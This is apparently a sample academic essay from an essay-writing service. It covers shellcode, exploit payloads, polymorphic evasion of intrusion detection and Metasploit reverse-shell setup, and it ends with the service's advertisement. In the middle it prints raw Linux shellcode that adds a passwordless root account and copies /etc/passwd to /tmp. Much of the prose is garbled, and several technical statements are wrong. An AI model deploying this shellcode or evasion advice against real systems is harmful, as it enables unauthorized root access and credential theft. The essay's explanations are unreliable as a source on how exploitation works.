Shellcode can be defined as an arrangement of directions for the processor infused and after that executed by an exploited program. Shellcode is utilized to specifically control registers and the usefulness of a compromised application program [4]. shell codes can be composed in high level programming languages but in some certain scenarios or states state dialect yet would tell they may not work as intended, so low level assembly language is favoured for shellcode generation.
For any exploitation the bottom line of an attack can be listed as the severity of the flaws in the application or network gateway that is going to be exploited [4]. The impact of any exploitation based attack depends on the successful exploitation of the found vulnerability. With a detailed vulnerability scanning of the targeted machine or the application can help in the successful completion of the exploitation attack.
The main three components of any exploitation attack are listed as the vector used for the attack, technique used for the exploitation and lastly the payload determined for the attack.
Attack vector: An attack vector is considered as the technique or means for a hacker through which the attacker can have access to some targeted computer or some targeted network. In this way the attacker delivers some specific payload or malicious code segment. Use of the attack vectors helps the attacker/hackers in order to exploit scanned vulnerabilities of a system or network server.
These attack vectors include shellcodes, e-mail attachments, viruses, pop-up windows, chat rooms, instant messages and so on. Most of these used vectors are software components or, in some cases hardware components. In this exploitation attacks, the users are deceived by exploiting the system vulnerabilities by using the different components such as shellcode.
Up to some extent, antivirus applications/firewalls applications are able to block some of the attack vectors from getting into the system or network [5]. For exploitation attack A defence method which considered as effective for some time but may not remain effective for always. The reason behind this can be stated as the attackers constantly changing and updating vectors using new techniques in order to gain unauthorized access to targeted servers, networks or workstations inside the network.
Technique used for exploitation:
Payload for the attack: Exploit payload is the functional component for any exploitation based attack. Usually for any kind of attack payloads includes bind, reverse shells or the meterpreter shell. Payload in the exploitation attack refers to the part of virus/malware or any cyber worm which is mainly responsible for the completion of malicious action on the victim machine/network.
There are three types payloads that are used in the attacks. These are Stagers, Stages and singles.
Stagers: This kind of payloads are small in size and are mainly intended establish communication among the victim machine and attacker machine. After establishing the communication, the process moves to next stage. Established communication channel between the attacker and target machine is very reliable. This kind payload is helpful for the attackers to re-use the codes developed for an attack [1]. The reason behind this reusability is separation of the establishment of the communication channel from actual attacking stage.
Stages: This type of payload modules are downloaded by the Stagers part. As the Stager takes care of communication channel the Stages payloads are often larger in size while having various options for delivering the payload and carrying out the option.
Single: These type of payload is self-contained but they are not connected to any other module. The main intention behind these payloads is establishing communications among the victim machine and attacker machine using Metasploit [3].
Exploitation technique: The attack algorithm is known as the exploitation technique used for the vulnerable exploitation attack.
Most of intrusion detection systems are dependent on the pre-defined signatures of different malwares, shell codes or viruses [4]. In order evade the IDS or the intrusion detection systems one of the best and popular methods are use of polymorphic shell codes. Polymorphism is a strategy to transform the malicious code to be represented in different manner unique each time it is run, yet despite everything it works in the same manner in which it may have done before the transformation.
With the use of polymorphism, attackers avoid the detection process of IDS since they try to get a match with the predefined signatures which does not match for a shellcode after its transformation [1]. Polymorphic engines are utilized to make a polymorphic shellcode.
In computing technology, the program counter can be defined as a special kind of the register that keeps track of the next instruction of an application that is going to be executed by the processing unit.
Both data and application instructions have a memory address on the memory of the system. This data and instructions are fetched from the memory location by the program counter and consecutively are executed by the processing unit.
At any certain point when some instruction is executed by the processing unit the concerned application refreshes the program counter with the following directions deliver that will be fetched from memory and executed next in turn [4]. In the following stage program counter sends the data to memory address enlist as a piece of execution cycle. Along these lines program counter raises value of the instruction counter by one for the following activity.
The attackers can exploit any vulnerability of the targeted machine or server through the control flow hijacking process [2]. In this process the attacker gains controls over the program counter and can redirect the flow of execution of instructions in such a way that the flow of the control so that it can help in desired action by the targeted machine or server
Following are the advantages of the using alphanumeric engine for generating shellcode compared to any other engine.
xB8x04x00x00x00xBBx01x00x00x00x8B
x0Dx00x00x00x00xBAx13x00x00x00xCD
x80xB8x03x00x00x00xBBx01x00x00x00x8B
x0Dx00x00x00x00xBAx17x00x00x00xCDx80
xB8x04x00x00x00xBBx01x00x00x00x8Bx0D
x00x00x00x00xBAx17x00x00x00xB8x01x00
x00x00xBBx00x00x00x00xCDx80
x6ax05x58x31xc9x51x68x73x73x77x64x68
x2fx2fx70x61x68x2fx65x74x63x89xe3x66
xb9x01x04xcdx80x89xc3x6ax04x58x31xd2
x52x68x30x3ax3ax3ax68x3ax3ax30x3ax68
x72x30x30x74x89xe1x6ax0cx5axcdx80x6a
x06x58xcdx80x6ax01x58xcdx80
Identification: Above shellcode is helpful in creating a root privileged user in the Linux system with the user name r00t without any password. The new data is saved in /etc/passwd directory.
x31xc0xb0x05x31xc9x51x68x73x73x77x64
x68x63x2fx70x61x68x2fx2fx65x74x8dx5c
x24x01xcdx80x89xc3xb0x03x89xe7x89xf9
x66x6axffx5axcdx80x89xc6x6ax05x58x31
xc9x51x68x66x69x6cx65x68x2fx6fx75x74
x68x2fx74x6dx70x89xe3xb1x42x66x68xa4
x01x5axcdx80x89xc3x6ax04x58x89xf9x89
xf2xcdx80x31xc0x31xdbxb0x01xb3x05xcd
x80
Identification: The given shellcode is helpful for the attacker’s in copying all the data from the /etc/passwd directory to the /tmp/outfile. In this way the attacker can have better accessibility to all the user account as the password data is stored in the outfile which can be exploited by the attacker.
The first command which is used is “msfconsole” which is used for getting into any metasploit console. After that “show exploit” commands are there which is used for available exploits from any kind of machine hacking.
In the provided attack, “metasploit/multi/ handler” is used by attacker for create and establishing connection to victim machine. After that “set PAYLOAD windows/meterpreter/reverse_tcp” is used for setting payload for the attack. The following command “msfvenom –p windows/meterpreter/reverse_tcp LHOST address” is used between victim and attacker which is mainly assigned to specific ports which are carryout as per the payload. In this whole mechanism or process LHOST is taken to be IP address of the given machine. Since both the given network works in same network, then it is likely that target machine to reach out of the given attacker mechanism to work in the same given network. The next step or stage in this SET LPORT: in the port the victim machine gets attack when target has established a connection with the machine [4]. The next stage is backdoor file that window machine can be achieve by enclosing it with proper password and message.
For the provided attack the reverse shell code can be used for exploiting the target. Reverse shell a type of shell in which target machine is convey back to the attacking machine. Attacking machine comes ups with a port with which it is associated and it utilizes various kinds of execution which needs to completed.
There are large number of methods which are used for generation of shellcode. A list has been provided like:
PWNtools: It is considered to be an essential part of CFT framework. This type of Shellcodes is used for exploiting the development library for any given framework. This particular tool is developed by the help of Python language. It is developed in such a way that is can provide rapid development along with prototyping [2]. It mainly comes up with many features or benefits but it is only used in the generation of shellcode. This particular module aims in development of assembly code which can be achieved by NASM which makes use of python language [1]. PWNtools does need any attacker to have an idea regarding the assembly to create shell. Different application provides tools which is helpful to write shellcodes in much better and faster way.
NASM: It is considered as the most basic kind of approach which is helpful in generation of Shellcodes. It aims in creation of shellcode which is achieved by assembly code.
Shellforge: It is developed by the help of Python language and comes up with ability to develop shellcodes by the help of C programming language.
Synesthesia approach: Compared to other approaches, thus approach is most recent one. This approach includes the following restrictions that makes the shellcodes more capable of hiding from the different monitoring tools [3]. The limitations of this approach are provided below;
No NULL bytes are allowed in the shellcode, used every ASCII letter converted to the uppercase. In order to make the shellcode more reliable and this technique uses format string Using the “%” character dicey.
All the bytes in the shell code must be printable (as well as Bytes must be alphanumeric) for escaping the IDS.
Use of msfvenom: Another approach that is popular in generating the shell codes is use of msfvenom available from the metasploit platform. Shellcodes developed in this approach includes only ASCII characters used in the exploitation.
The benefit of this solution is that we have not write by anything. We have make use of shellcodes which are predefined for any platforms. For NASM, the biggest disadvantage is that the tool is not useful for generation of any shellcode for other platforms like android.
It is a well-known technique which mainly encodes a shellcode and responsible for any kind of exploitation vulnerability into polymorphism structure. It is shellcode which is indicated by the given marks. Polymorphism is considered to be the best technique for the above situation [5]. An attacker can easily scramble or pack the given shellcode and then after that it prepend a proper bit code which is decompressed in the given adventure. As the mark for shellcode cannot be reflected in the given polymorphic frame, then IPS can easily fail to figure out.
[1] J. Mason, S. Small, F. Monrose and G. MacManus, “English shellcode.” , In Proceedings of the 16th ACM conference on Computer and communications security . pp. 524-533, 2009.
[2]T. Cheng, Y. Lin, Y. Lai and P. Lin, “Evasion Techniques: Sneaking through Your Intrusion Detection/Prevention Systems”, IEEE Communications Surveys & Tutorials, vol. 14, no. 4, pp. 1011-1020, 2012.
[3]K. Iwamoto and K. Wasaki, “A Method for Shellcode Extractionfrom Malicious Document Files Using Entropy and Emulation”, International Journal of Engineering and Technology, vol. 8, no. 2, pp. 101-106, 2016.
[4]T. Okamoto, “SecondDEP: Resilient Computing that Prevents Shellcode Execution in Cyber-Attacks”, Procedia Computer Science, vol. 60, pp. 691-699, 2015.
[5]M. Chen, C. Hu, D. Tian, X. Wang, Y. Liu and N. Li, “Shellix: An Efficient Approach for Shellcode Detection”, International Journal of Security and Its Applications, vol. 10, no. 6, pp. 107-122, 2016.
[6]T. Lu, L. Zhang and Y. Fu, “A Novel Immune-Inspired Shellcode Detection Algorithm Based on Hyperellipsoid Detectors”, Security and Communication Networks, vol. 2018, pp. 1-10, 2018.
[7]I. Arce, “The shellcode generation”, IEEE Security & Privacy Magazine, vol. 2, no. 5, pp. 72-76, 2004.
Essay Writing Service Features
Our Experience
No matter how complex your assignment is, we can find the right professional for your specific task. Contact Essay is an essay writing company that hires only the smartest minds to help you with your projects. Our expertise allows us to provide students with high-quality academic writing, editing & proofreading services.
Free Features
Free revision policy
$10Free bibliography & reference
$8Free title page
$8Free formatting
$8How Our Essay Writing Service Works
First, you will need to complete an order form. It's not difficult but, in case there is anything you find not to be clear, you may always call us so that we can guide you through it. On the order form, you will need to include some basic information concerning your order: subject, topic, number of pages, etc. We also encourage our clients to upload any relevant information or sources that will help.
Complete the order form
Once we have all the information and instructions that we need, we select the most suitable writer for your assignment. While everything seems to be clear, the writer, who has complete knowledge of the subject, may need clarification from you. It is at that point that you would receive a call or email from us.
Writer’s assignment
As soon as the writer has finished, it will be delivered both to the website and to your email address so that you will not miss it. If your deadline is close at hand, we will place a call to you to make sure that you receive the paper on time.
Completing the order and download